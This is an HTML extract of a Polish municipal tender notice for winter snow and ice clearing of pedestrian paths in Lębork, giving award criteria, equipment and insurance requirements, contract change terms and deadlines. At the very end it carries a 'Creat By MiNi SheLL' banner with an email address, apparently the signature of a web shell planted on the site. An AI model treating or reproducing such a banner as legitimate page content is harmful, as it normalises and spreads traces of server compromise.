<h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE 3 - ZIMOWE UTRZYMANIE CIĄGÓW PIESZYCH NA TERENIE PIĘCIU SEKTORÓW MIASTA<br/>1.) Przedmiot zamówienia stanowi: Zimowe utrzymanie chodników, parkingów oraz ścieżek rowerowych stanowiących własność Gminy Miasto Lębork,w granicach administracyjnych miasta Lęborka w sezonie zimowym – 2021/2022. Zakresem objętym przedmiotem zamówienia jest również zaopatrzenie sprzętu w niezbędne kruszywa do usuwania śliskości i oblodzeń. <br/>2) Zimowe utrzymanie będzie wykonywane zgodnie z IV i V standardem utrzymania dróg w okresie zimowym. Standard ten określony został w Załączniku nr 1 do SWZ.<br/>3) Usługę należy wykonywać w przypadku wystąpienia zjawisk atmosferycznych wymagających konieczności zimowego utrzymania.<br/> a) szacowana ilość roboczogodzin przy zgarnianiu śniegu lub błota pośniegowego z wykorzystaniem pełnego zestawu wraz z posypywaniem mieszanką solno -piaskową (materiał Wykonawcy): komunalny samochód specjalistyczny z solarką do mieszanki i zawieszanym pługiem chodnikowym sterowanym hydraulicznie - 600r/g na 5 sektorów <br/>4.) Szacowana ilość roboczogodzin praca zestawu przy zgarnianiu śniegu lub błota pośniegowego (komunalny samochód specjalistyczny z solarką do mieszanki i zawieszanym pługiem chodnikowym sterowanym hydraulicznie) - 200 rg na 5 sektorów.<br/>5.) Szczegółowy opis przedmiotu zamówienia, opis wymagań Zamawiającego w zakresie realizacji przedmiotu zamówienia określają:<br/> • opis przedmiotu zamówienia (zwany OPZ) – załącznik nr 1 do SWZ, będący jednocześnie załącznikiem do umowy.<br/> • projektowane postanowienia umowy (projekt umowy) – załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.)Zamawiający przewiduje skorzystania z Prawa opcji, o którym mowa w art. 31 ust. 2 ustawy Pzp w wysokości 30% wartości zamówienia podstawowego.<br/>2.) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji:<br/> • Procedura wykorzystująca prawo opcji dotyczy wszystkich części zamówienia<br/>• Zastosowanie przez Zamawiającego prawo opcji obejmuje możliwość rozszerzenia tego samego zakresu zamówienia podstawowego w każdej części (tj. w ramach umowy podstawowej).<br/>• W wyniku zastosowania prawa opcji wynagrodzenie Wykonawcy ulegnie zwiększeniu proporcjonalnie do faktycznie wykonanych usług. <br/>• Ceny jednostkowe dla zamówienia realizowanego w ramach prawa opcji będą takie same jak ceny jednostkowe określone dla zamówienia podstawowego.<br/>• Wszystkie wymagania zawarte w SWZ dotyczą także realizacji zamówienia w ramach prawa opcji. <br/>• Zastosowanie przez Zamawiającego prawa opcji związane jest z warunkami pogodowymi lub innymi zmianami, których Zamawiający nie był w stanie przewidzieć w momencie udzielania zamówienia, a które odnoszą się do zakresu zamówienia podstawowego, w szczególności zwiększoną intensywnością opadów śniegu i powstaniem ślizgawicy.<br/>3.) Prawo opcji jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać, w ramach realizacji niniejszego zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>4.) Warunkiem uruchomienia prawa opcji jest oświadczenie woli Zamawiającego wykonania zamówienia w ramach prawa opcji i złożenie odpowiedniego zamówienia częściowego wykraczającego poza wykonanie usług stanowiących zamówienie podstawowe przedłożone Wykonawcy w formie pisemnej. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>1.) Cena – waga kryterium 60% (60pkt);<br/>2.) Czas przystąpienia do realizacji usługi – waga kryterium 40% (40pkt).<br/>2. Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>KRYTERIUM: CENA – 60% , WAGA 60 pkt<br/>Liczba punktów w kryterium „CENA” (C) zostanie obliczona, według poniższych zasad:<br/> • Ocenie podlega cena całkowita brutto oferty wyrażona w PLN. <br/> • Ofercie z najniższą ceną Zamawiający przyzna maksymalną liczbę punktów – 60 pkt.<br/> • Pozostałym ofertom Zamawiający przyzna punkty obliczone wg wzoru:<br/><br/><br/>Cena najniższa ze wszystkich ofert x Znaczenie kryterium 60%<br/>Cena oferty badanej<br/><br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium: CENA.<br/><br/>KRYTERIUM: CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA – 40% , WAGA 40 pkt <br/>Liczba punktów w kryterium „CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA” (CRZ) zostanie obliczona, według poniższych zasad:<br/> • Ocenie podlegać będzie czas przystąpienia do realizacji zadania wyrażony w godzinach wynikający z oferty złożonej przez Wykonawcę.<br/> • W przypadku zaoferowania przez Wykonawcę czasu realizacji zadania wyrażony w godzinach oferta może uzyskać od 20 pkt. i 40 pkt.<br/> • Termin realizacji zadania wyrażony w godzinach nie może być dłuższy niż 1 h. Zaoferowanie okresu dłuższego niż 1 h skutkowało będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp . <br/> • W przypadku niewpisania przez Wykonawcę czasu realizacji zadania wyrażony w godzinach, Zamawiający uzna, że Wykonawca zaoferował okres maksymalny (max) (wymagany) wynoszący 1 h.<br/>Ocena punktowa oferty w tym kryterium zostanie przeprowadzona następującego:<br/> • Oferta, której zadeklarowany zostanie czas do ½ h od zgłoszenia otrzyma - 40 pkt<br/> • Oferta, której zadeklarowany zostanie czas do 1 h od zgłoszenia otrzyma - 20 pkt<br/> • Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium: „CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA”<br/><br/>Zamawiający dokona zsumowania punktów przyznanych w kryteriach. tj.:<br/>Łączna liczba punktów za ofertę = liczba punktów za C brutto (max. 60) + liczba punktów za CRZ (max. 40). Maksymalnie oferta może uzyskać 100 pkt. <br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">CZAS PRZYSTĄPIENIA DO REALIZACJI ZADANIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia łącznie następujące warunki: <br/>• nie podlega wykluczeniu na podstawie art. 108 ust. 1 Pzp, z uwzględnieniem postanowień art. 110 Pzp,<br/>• spełnia warunki, o których mowa w art. 112 ust. 2 Pzp, określone w pkt 2. <br/>2) Warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 Pzp dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu<br/>Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia – nie spełnia. <br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu.<br/>Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia – nie spełnia. <br/>c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada odpowiednie ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, ważne przez cały okres obowiązywania umowy, na kwotę co najmniej 200 000,00 zł na ZADANIE.<br/> W przypadku składania ofert na więcej niż jedną część (ZADANIE) zamówienia kwota polisy musi być równa co najmniej sumie wartości wymaganych dla poszczególnych części zamówienia, na które Wykonawca składa oferty.<br/>Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia – nie spełnia<br/>d) zdolności technicznej lub zawodowej:<br/>e) Warunek zostanie spełniony, jeżeli w złożonych dokumentach i oświadczeniach Wykonawca jednoznacznie wykaże, że:<br/>• w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi zimowego utrzymania dróg oraz, że usługi te zostały wykonane należycie. <br/>Wartość usług należy podać w wysokości określonej dla poszczególnych części o wartości nie mniejszej niż:<br/>• na ZADANIE 1: 100 000,00 zł brutto, (wartość jednego sezonu zimowego)<br/>• na ZADANIE 2: 50 000,00 zł brutto,(wartość jednego sezonu zimowego)<br/>• na ZADANIE 3: 100 000,00 zł brutto,(wartość jednego sezonu zimowego)<br/>W przypadku składania ofert na poszczególne sektory, łączna wartość winna odpowiadać sumie dla każdego sektora.<br/>W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, ww. warunek musi spełniać co najmniej jeden z Wykonawców.<br/>Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie złożonych przez Wykonawcę dokumentów, o których mowa w pkt 8 ppkt 2) rozdziału II SWZ oraz treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia - nie spełnia.<br/>• dysponuje lub będzie dysponował następującym potencjałem technicznym: <br/> a) min. 2 pługopiaskarki/solarki o następujących parametrach: <br/> • nośnik do piaskarki/solarki – samochód ciężarowy o ładowności min. 7 M<br/>• piaskarka/solarka – demontowana o następujących parametrach:<br/>• bezobsługowy przenośnik taśmowy i nowoczesny układ sterowania elektronicznego<br/> • (bezstopniowa regulacja szerokości posypywania i gęstości posypywania),<br/>• przystosowana do materiału – soli drogowej, mieszanki solno-piaskowej 1:2,<br/>• napęd solarki – hydrauliczny, działający niezależnie od ruchów nośnika (bez piątego koła),<br/>• dozowanie środków niezależnie od prędkości jazdy,<br/>• zawieszany, czołowy pług drogowy, sterowany hydraulicznie w każdą stronę.<br/> b) min. 2 pługi drogowe o następujących parametrach:<br/> • nośnik – samochód ciężarowy o ładowności min. 7 Mg<br/> • zawieszany, czołowy pług drogowy, sterowany hydraulicznie w każdą stronę.<br/> c) min. 5 samochodów specjalistycznych typu Multicar lub podobny z piaskarko/solarką drogową o następujących parametrach:<br/> • bezobsługowy przenośnik taśmowy z układem sterowania elektronicznego (bezstopniowa regulacja szerokości posypywania i gęstości posypywania), przystosowana do materiału – piasku lub mieszanki solno-piaskowej, napęd piaskarko/solarki: hydrauliczny,<br/> • dozowanie środków niezależnie od prędkości jazdy, zawieszany, czołowy pług drogowy, sterowany hydraulicznie w każdą stronę.<br/> oraz utrzymanie tego sprzętu w gotowości technicznej, przez okres objęty Umową bez dodatkowego wynagrodzenia. Sprzęt jw. winien być dedykowany dla potrzeb niniejszego zamówienia i może być użytkowany na innych zadaniach wyłącznie w okresach, gdy nie jest prowadzone odśnieżanie.<br/>Wyżej wymieniona ilość sprzętu jest ilością minimalną dla każdego ZADANIA. Faktyczna ilość sprzętu jaką Wykonawca będzie musiał zastosować będzie wynikała z rzeczywistych potrzeb w celu prawidłowej realizacji zamówienia.<br/>Pojazdy muszą posiadać dowody rejestracyjne z aktualnymi badaniami technicznymi dopuszczającymi do ruchu, aktualne ubezpieczenie od odpowiedzialności cywilnej (OC) oraz od następstw nieszczęśliwych wypadków (NNW). <br/>Wykonawca nie może wykazywać tych samych pojazdów w różnych częściach (ZADANIACH) zamówienia. <br/>Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej, zostanie dokonana na podstawie złożonych przez Wykonawcę dokumentów, o których mowa w pkt 8 ppkt 2) rozdziału II SWZ oraz treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia - nie spełnia<br/>3) Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/> 4) Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania Wykonawca zobowiązany jest przedłożyć Zamawiającemu następujące oświadczenia i dokumentyaktualne na dzień składania ofert <br/>1.) oświadczenie o którym mowa w art. 125 ust.1 ustawy Pzp o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu zakresie wskazanym w rozdziale II, podrozdział 6 i 7 SWZ, stanowiącym załącznik nr 3 do SWZ. <br/>Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II, podrozdział 8 pkt 2 SWZ<br/>2.)Ooświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 9 do SWZ)<br/> 3. Jeśli dotyczy:<br/> a.) Pełnomocnictwo <br/> b.) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Załącznik nr 5 do SWZ<br/> c.) Zobowiązanie podmiotu trzeciego - Załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca zobowiązany jest przedłożyć Zamawiającemu następujące oświadczenia i dokumenty:<br/> 1. aktualne na dzień składania ofert oświadczenie o którym mowa w art. 125 ust.1 ustawy Pzp o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu zakresie wskazanym w rozdziale II, podrozdział 6 i 7 SWZ, stanowiącym załącznik nr 3 do SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane w rozdziale II, podrozdział 8 pkt 2 SWZ<br/> 1. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ( załącznik nr 5 do SWZ);<br/> 2. wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (załącznik nr 6 do SWZ)<br/> 3. Jeżeli Wykonawca ubiega się o udzielenie zamówienia na kilka części, nie może celem wykazania spełnienia warunków udziału w postępowaniu wskazywać w więcej niż jednej części: <br/> • wartości tego samego doświadczenia, <br/> • tych samych osób przewidzianych do realizacji zamówienia,<br/> • tego samego potencjału technicznego,<br/> • tego samego potencjału finansowego.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia(spółki cywilne, konsorcja)<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oferta przedstawiona przez dwóch lub więcej Wykonawców (współpartnerów) wchodzących w skład konsorcjum lub spółki cywilnej musi być przedstawiona jako jedna oferta, od jednego podmiotu i spełniać następujące wymagania:<br/>a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Umocowanie (stosowne pełnomocnictwo) należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>b) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zostanie wybrana, Zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej współpracę tych Wykonawców.<br/>c) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty potwierdzające brak podstaw do wkluczenia z postępowania składa w swoim imieniu każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie składane na podstawie art. 125 ust 1 ustawy Pzp, potwierdza brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 3 do SWZ.<br/>d) Wypełniając Formularz oferty, jak również inne dokumenty powołujące się na „Wykonawcę”; w miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane dotyczące wszystkich Wykonawców (współpartnerów) wspólnie ubiegających się o zamówienie., a nie ich pełnomocnika (lidera) lub jednego ze współpartnerów.<br/>e) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie odpowiadają za podpisanie i wykonanie umowy. <br/>f) W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny z Pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem (liderem). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony, poza możliwością zmiany zawartej Umowy na podstawie art. 455 Pzp, przewidują również możliwość dokonywania zmian postanowień zawartej Umowy, które mogą dotyczyć:<br/>1) terminu realizacji przedmiotu niniejszej umowy wskazanego w § 3, w przypadku wystąpienia warunków atmosferycznych powodujących konieczność zmiany okresu ZUD, <br/>2) innych warunków umowy jeżeli w chwili zawarcia umowy nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego,<br/>3) zmiany zakresu przedmiotu umowy oraz związaną z tym zmianą wynagrodzenia w przypadku wystąpienia warunków atmosferycznych powodujących konieczność zwiększenia zakresu działań ZUD, <br/>4) innych warunków umowy, jeżeli w chwili zawarcia umowy nie znane były fakty mające na nie wpływ, przy jednoczesnym założeniu, że zakres zmian spowoduje następstwa korzystne dla Zamawiającego, 5) treści umowy podczas jej realizacji w przypadku wystąpienia konieczności dokonania uszczegółowienia wykładni lub doprecyzowania poszczególnych zapisów Umowy, nie powodujących zmiany celu i istoty niniejszej umowy,<br/>6) z powodu okoliczności będących następstwem „siły wyższej”, za którą Strony rozumieją działanie niezależne od Stron, których nie mogły przewidzieć ani im zapobiec pomimo zachowanej należytej staranności.<br/>2. Zamawiający, po stwierdzeniu, że okoliczności związane z wystąpieniem COVID-19, wpływają na należyte wykonanie umowy, w uzgodnieniu z Wykonawcą dokonuje zmiany umowy, o której mowa w art. 455 ust. 1 pkt 4 ustawy Pzp przez: <br/>1) zmianę sposobu wykonywania usług, <br/>2) zmianę zakresu świadczenia Wykonawcy i odpowiadającą jej zmianę wynagrodzenia lub sposobu rozliczenia wynagrodzenia Wykonawcy, <br/>- o ile wzrost wynagrodzenia spowodowany każdą kolejną zmianą nie przekroczy 50% wartości pierwotnej umowy. <br/>3. Warunkiem dokonania zmian jest uzasadnienie konieczności i wskazanie wpływu zmian na realizację przedmiotu umowy oraz zgłoszenie wniosku o zmianę w terminie 30 dni od dnia wystąpienia jednej z okoliczności, o których mowa w ust. 1 i 2. <br/>4. Zmiana umowy dokonana z naruszeniem przepisu ust. 1 i 2 jest nieważna.<br/>5. Wszelkie zmiany i uzupełnienia niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. <br/>6. Dokonanie zmiany umowy w zakresie, o których mowa powyżej wymaga uprzedniego złożenia na piśmie prośby Wykonawcy wykazującej zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-03 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com